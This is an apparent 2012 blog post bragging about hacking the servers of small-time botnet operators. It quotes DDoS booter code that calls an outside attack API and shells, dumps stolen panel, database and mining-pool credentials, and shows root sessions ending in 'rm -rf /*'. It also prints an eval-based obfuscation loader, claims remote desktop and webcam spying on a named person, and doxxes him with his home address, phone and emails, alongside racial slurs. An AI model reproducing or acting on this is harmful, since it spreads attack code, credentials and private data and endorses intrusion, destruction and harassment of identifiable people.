Thursday, December 13, 2012

Nyx Stresser


http://www.hackforums.net/showthread.php?tid=2899035

One of many shitty "booters". Took it down just now.



I'm not going to release the source because that would simply encourage skids to copy and paste it and make their own. Here's the core DoS logic though, from "hub.php":

@file_get_contents("http://atomicapi.net/send.php?key={$keyBoot}&host={$host}&port={$port}&time={$time}");

$select = mysql_query("SELECT * FROM shells WHERE status = 'up'");
//shells = "http://95.211.186.68/sudp.php", "http://178.18.19.122/sno.php"

while ($item = mysql_fetch_array($select)) {
    $ch = curl_init($item['url']."?act=phptools&type=".$type."&host=".$host."&time=".$time."&port=".$port);
}
So it uses the "atomic API" DDoS service plus two PHP DoS shells on cheap VPSs rented by the owner. Very sophisticated.

Here's the user table from the database. All password hashes are unsalted md5. Some already cracked. For the ones that I was too lazy to crack, try Googling the hash and you'll have a decent success rate.

Account Dump:
http://pastebay.net/1173575

Saturday, December 8, 2012

Nick Moses, botnet master

Daily / Nick Moses is at it again.


Ran the uninstall command for a good few hours.

It reached about 250 executions
He logged in and noticed, removed it, and changed all his passwords.

Ran the command again; he noticed once more. This time he changed the database password, fucking up his own Blackshades panel for quite a few hours before he realized what he did.

Nick Moses, intrusion prevention expert

Finally I got in a third time and made a small modification to Blackshades' command processing file that would silently run the uninstall command. That took out the rest of his Blackshades bots. Over the course of the week about 1300 bots were uninstalled.

Blackshades panel credentials:
micknoses:Nigger123:67.189.249.252
apoc:copa:74.36.162.180
define('DB_SERVER', "localhost");
define('DB_USER', "root");
define('DB_PASS', "Nigger123");
define('DB_DATABASE', "niggers");
$CFG_PASSWORD = "Nigger123";
daily500:nigger123456@pool.bitclockers.com:8332 //Bitcoin pool credentials for his bots
Top notch security.


He also had the same password stealer as last time ("Pieces of Eight"). Wiped about 8000 password captures.

Here was some of the shit on his server:
$ ssh root@daily-apoc.com
root@daily-apoc.com's password: 
[root@Daily-Apoc ~]# ls -al
total 153340
drwxr-x---  3 root root     4096 Dec  1 19:53 .
drwxr-xr-x 20 root  500     4096 Dec  1 15:25 ..
-rw-------  1 root root      728 Dec  1 19:53 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-rw-r--r--  1 root root 84733045 Sep 30 20:31 xampp-linux-1.8.1.tar.gz
-rw-r--r--  1 root root 39143077 Sep 30 20:31 xampp-linux-devel-1.8.1.tar.gz
-rw-r--r--  1 root root 33103312 Sep 30 20:31 xampp-linux-upgrade-1.8.0-1.8.1.tar.gz
drwxr-xr-x  3 root root     4096 Sep 30 12:52 xampp-upgrade
[root@Daily-Apoc ~]# last -ai
root     pts/1        Sun Dec  2 13:15 - 16:27  (03:11)     67.189.249.252
root     pts/0        Sat Dec  1 15:34 - 19:53  (04:18)     174.127.99.221
reboot   system boot  Sat Dec  1 15:25          (13:57)     0.0.0.0
root     pts/1        Sun Apr  5 19:36 - 19:36  (00:00)     81.152.164.227
root     pts/0        Sun Apr  5 19:28 - down   (00:07)     81.152.164.227
reboot   system boot  Sun Apr  5 19:28          (00:07)     0.0.0.0
root     pts/0        Sun Apr  5 19:24 - down   (00:02)     81.152.164.227
reboot   system boot  Sun Apr  5 19:24          (00:02)     0.0.0.0

wtmp begins Sun Apr  5 19:23:49 2009
[root@Daily-Apoc ~]# ls -al /opt/lampp/htdocs/installation/ /opt/lampp/htdocs/update/
/opt/lampp/htdocs/installation/:
total 172
drwxr-xr-x 9 root   root  4096 Dec  1 16:45 .
drwxr-xr-x 6 nobody root  4096 Dec  2 00:49 ..
-rw-r--r-- 1 root   root  2000 Mar  2  2011 alive.php
-rw-r--r-- 1 root   root 10602 Mar  4  2011 bots.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:42 classes
-rw-r--r-- 1 root   root 14907 Mar  4  2011 cmd.php
-rw-r--r-- 1 root   root   522 Dec  1 16:40 config.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:42 db
-rw-r--r-- 1 root   root 12425 Mar  2  2011 dos.php
-rw-r--r-- 1 root   root  2502 Feb 28  2011 fg.php
-rw-r--r-- 1 root   root   978 Jan 14  2011 header.php
drwxr-xr-x 4 root   root  4096 Dec  1 16:44 img
-rw-r--r-- 1 root   root  2314 Jan 27  2011 index.php
-rw-r--r-- 1 root   root 12381 Mar  4  2011 install.php
-rw-r--r-- 1 root   root  1279 Dec 31  2010 logout.php
-rw-r--r-- 1 root   root  9018 Mar  4  2011 logs.php
-rw-r--r-- 1 root   root  6541 Mar  2  2011 main.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:34 pieces
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 plugins
-rw-r--r-- 1 root   root  9185 Feb 28  2011 pws.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 screens
-rw-r--r-- 1 root   root  1127 Mar  2  2011 scr.php
-rw-r--r-- 1 root   root  7746 Jan 26  2011 settings.php
drwxr-xr-x 2 root   root  4096 Dec  1 16:45 webcam
-rw-r--r-- 1 root   root  6831 Mar  2  2011 webc.php

/opt/lampp/htdocs/update/: // CVE-2012-4681 Java driveby
total 28
drwxr-xr-x 3 root   root 4096 Dec  2 01:04 .
drwxr-xr-x 6 nobody root 4096 Dec  2 00:49 ..
-rw-r--r-- 1 root   root  915 Dec  1 21:34 Certificate.crt
drwxr-xr-x 2 root   root 4096 Dec  2 01:06 download
-rw-r--r-- 1 root   root  782 Dec  2 00:49 index.php
-rw-r--r-- 1 root   root  782 Dec  2 00:49 install.php
-rw-r--r-- 1 root   root 3150 Dec  1 21:34 java.jar

// Blackhole iframe injector, deobfuscated URL is hxxp://blackhole.twilightparadox.com/analytics/except/turn-engineer_charges_got.php

[root@Daily-Apoc ~]# cat /opt/lampp/htdocs/videos/index.php
<script>//long obfuscated code</script>

// and finally
[root@Daily-Apoc ~]# rm -rf /*


He also recently managed to independently become infected with some malware himself, causing a bit of public embarrassment on a popular malware forum: http://trojanforge.com/showthread.php?t=1425

lol
He wasn't too happy about this turn of events.




Sunday, December 2, 2012

"Suit"

For the first time, we have a "developer" here on the skid list. Indeed, a professional programmer of great prowess and ingenuity.

He goes by the name "Suit" (also "saywh4t" and others) on skidforums: http://www.hackforums.net/member.php?action=profile&uid=438020

At first glance, he appears to be a typical "bot herder," trojan spreader, and password thief. Dime a dozen.

Bot exchanging service

lol


What makes him stand out, though, are his endeavoring malware development projects:

Shitty advertisement


Another shitty advertisement


Truly revolutionizing the field of skidware. Do his claims hold any water, though? What gives his "products" a competitive edge?

Suit, otherwise known as Reece Chambers, did all of his development for s00tbot with webhosting from xhostfire.com; a now defunct web hosting service for skids.

I gently slipped a shell into his website's sandy beach and listened to its soft murmurs.

$ uname -a
Linux usa.xhostfire.com 2.6.18-274.18.1.el5.028stab098.1 #1 SMP Sat Feb 11 15:30:41 MSK 2012 i686 i686 i386 GNU/Linux
$ last -i
cunningp pts/0        130.216.30.121   Thu May 17 14:25 - 14:25  (00:00)
root     pts/0        70.95.123.70     Mon Apr 30 06:46 - down   (00:00)
sunnyval pts/0        174.56.103.168   Sun Apr  8 15:52 - 15:52  (00:00)
hackal   pts/0        46.99.251.19     Sun Apr  1 08:16 - 08:16  (00:00)
albini   pts/0        46.99.251.19     Sun Apr  1 08:15 - 08:15  (00:00)
socialen pts/0        96.44.101.216    Sat Mar 31 15:14 - 15:14  (00:00)
root     pts/0        85.76.123.168    Mon Mar 26 07:09 - down   (01:42)

$ ls -al ~/public_html/*

/home/cunningp/public_html/Website:
total 5672
drwxr-xr-x  7 cunningp cunningp    4096 May 23 02:43 .
drwxr-xr-x 12 cunningp nobody      4096 May 30 06:32 ..
-rw-r--r--  1 cunningp cunningp     220 Apr 25 17:42 .wysiwygPro_preview_339a5242a75565fc8cdd28b92e3ac846.php
drwxr-xr-x  2 cunningp cunningp    4096 May  2 22:34 Images
-rw-r--r--  1 cunningp cunningp 1419623 Apr 30 20:29 SecurityPanel(no_Install).zip
-rw-r--r--  1 cunningp cunningp 1406284 Apr 29 23:14 SecurityPanel.zip
drwxr-xr-x  2 cunningp cunningp    4096 Apr 17 18:43 SpryAssets
drwxr-xr-x  2 cunningp cunningp    4096 Apr 17 17:45 Templates
-rw-r--r--  1 cunningp cunningp    7741 May  3 22:01 about.php
-rw-r--r--  1 cunningp cunningp    2872 Apr 17 17:59 clients.html
-rw-r--r--  1 cunningp cunningp     923 Apr 26 23:04 clients.php
-rw-r--r--  1 cunningp cunningp    1682 May  1 21:02 config.php
-rw-r--r--  1 cunningp cunningp 2849380 May 30 16:39 error_log
-rw-r--r--  1 cunningp cunningp       0 May  1 20:48 gate.php
-rw-r--r--  1 cunningp cunningp     871 May  1 21:06 gatev2.php
-rw-r--r--  1 cunningp cunningp    1266 May  1 02:42 hidetest.php
drwxr-xr-x  2 cunningp cunningp    4096 May  4 08:08 include
-rw-r--r--  1 cunningp cunningp    2748 May  2 20:42 newClient.php
-rw-r--r--  1 cunningp cunningp    4137 May  2 21:43 newCommand.php
-rw-r--r--  1 cunningp cunningp    3274 May  2 20:32 newStat.php
-rw-r--r--  1 cunningp cunningp    2262 May  3 03:55 query.php
drwxr-xr-x  3 cunningp cunningp    4096 Apr 17 15:58 source
-rw-r--r--  1 cunningp cunningp    2133 Apr 23 01:37 statistics.html
-rw-r--r--  1 cunningp cunningp     751 Apr 25 20:38 stats.php
-rw-r--r--  1 cunningp cunningp    2459 Apr 27 02:55 style(original).css
-rw-r--r--  1 cunningp cunningp    4115 May  3 18:13 style.css
-rw-r--r--  1 cunningp cunningp    5372 May  2 19:28 test.php
-rw-r--r--  1 cunningp cunningp    2629 Apr 30 02:30 test2.php

[etc...]

$ ls -al /root              // root home dir is 777, lol
total 19416
-rw-r--r--  1 root root    10113 Mar  5 12:27       1
drwxrwxrwx 21 root root     4096 May 30 08:33 .
drwxr-xr-x 22 root root     4096 May 30 09:15 ..
-rw-------  1 root root      318 Apr 30 06:46 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
[snip]
drwxr-xr-x  2 root root     4096 Mar 24 20:14 gott4
-rw-r--r--  1 root root    26065 Jan 29 02:20 gott4.zip
-rw-r--r--  1 root root    36358 Mar 24 20:04 index.html
-rw-r--r--  1 root root    30580 Mar 24 20:04 index.html?h=96f62342bc4f8f81944d259b6e0c153e&t=1332579809&f=92c4469c
-rwx------  1 root root     1067 Jan 10  2006 install.sh
-rw-r--r--  1 root root     1067 Jan 10  2006 install.sh.1
-rw-r--r--  1 root root     1067 Jan 10  2006 install.sh.2
drwxr-xr-x  2 root root     4096 Jan 17 18:25 public_ftp
drwxr-xr-x  3 root root     4096 Jan 17 18:25 public_html
-rw-r--r--  1 root root    12027 Mar 24 20:11 slow.pl
-rw-r--r--  1 root root     1286 Mar 24 20:06 syn.pl
drwxr-xr-x  3 root root     4096 May 30 02:41 tmp
-rwx------  1 root root      443 Jan 10  2006 uninstall.ddos
-rw-r--r--  1 root root      443 Jan 10  2006 uninstall.ddos.1
-rw-r--r--  1 root root      443 Jan 10  2006 uninstall.ddos.2



Here's some of his botnet panel code; his comments prefaced with "//", mine with "/*".

$hwid = ($_POST['hwid']);  //Collects hwid
...
$pc = ($_POST['pc']);    //Collects pc name
/* what ever would I do without those helpful comments */
$query = "INSERT INTO `".$sqlSettings['tableVisitorsList']."`";
$query .= "VALUES('', '$ipAddress', '$hwid', '$pc', '$os', '$status', '$country', '$mode', '', '$tStamp', '$tStamp', '', '')";
/* this looks perfectly safe */

He also made his own proprietary PHP "obfuscator" for distributing the source, which sadly enough I'm sure will still stop most script babbies.

function kEFFEX($NmkVE)
{
$NmkVE=gzinflate(base64_decode($NmkVE));
 for($i=0;$i<strlen($NmkVE);$i++)
 {
$NmkVE[$i] = chr(ord($NmkVE[$i])-1); /* this ain't your father's gzinflate base64decode...he subtracts 1 and renames some variables too! */
 }
 return $NmkVE;
 }eval(kEFFEX('longfuckingstring');

The binary itself is some shitty generic C#. Really making waves. Yawn.


Anyway, next I moved onto his Dropbox.

He put a very frightening legal notice inside his Dropbox folder:

DROPBOX EMPLOYEE'S PLEASE NOTE: All items in this folder are protected by the Digital Millennium Copyright Act,


Scanning, Decompiling, Executing, or Submitting these files to any entity without the expressed permission of Myself


is ILLEGAL and a VIOLATION of the DMCA laws and If you violate these laws we will contact our lawyers

I immediately stopped surveying the contents of the folder and DBAN'd my drive to avoid the risk of a lawsuit.

Since he foiled my plans to look at his Dropbox, I was about ready to throw my arms in the air and give up.

However, I got to thinking. His Dropbox was off-limits, but why not just remote into his desktop? I didn't see any mention of that in the DMCA warning. A loophole!

So I did, just to take a peek.

Just snapped a few brief shots. I certainly did not want to intrude!


Reece viewing his own botnet panel
Chatting with friends
Presumably transfering malware to another computer of his



I wanted to get a more personal look at Mr. Chambers. So much more can be conveyed in person than through cold, drab internet posts.

So, I sent an electromagnetic pulse to his webcam's lense and peered through it.

Hey, I can barely see you!
That's better.

So there're my observations of his programming abilities and top notch security safeguards.

Finally, here's a bit of info about Reece. All previously mentioned files, including his website and more goodies, are located at the bottom.

Suit/Hyphee/saywh4t (Reece Chambers)
http://www.hackforums.net/member.php?action=profile&uid=438020

Reece Chambers
10 Ngataringa Rd.
Devonport, Auckland
0624
New Zealand
Phone: 09-445 4496

Emails:

hyphee@windowslive.com (MSN)
saywh4t@gmail.com
subjective.suit@gmail.com
hyphee@gmail.com
r.hyphee@gmail.com

Facebook: http://www.facebook.com/reece.chambers.58
Stalker Facebook: http://www.facebook.com/profile.php?id=100002535412838
"crackhackforum" account: http://www.crackhackforum.com/user-26879.html
Skype: rsnoopyc

Usernames:

Suit
Hyphee
TheRealHyphee
saywh4t

Aliases:

George Tubby
George Phuey

Domains:

cunningpanda.com
xhpel.co.cc
youlaugh.co.cc
lots more

Files: http://www.mediafire.com/?zh65o6rc6ge6gz9
(may be flagged by AV due to his malware binaries)


A lot more blog updates coming soon.
Spread the word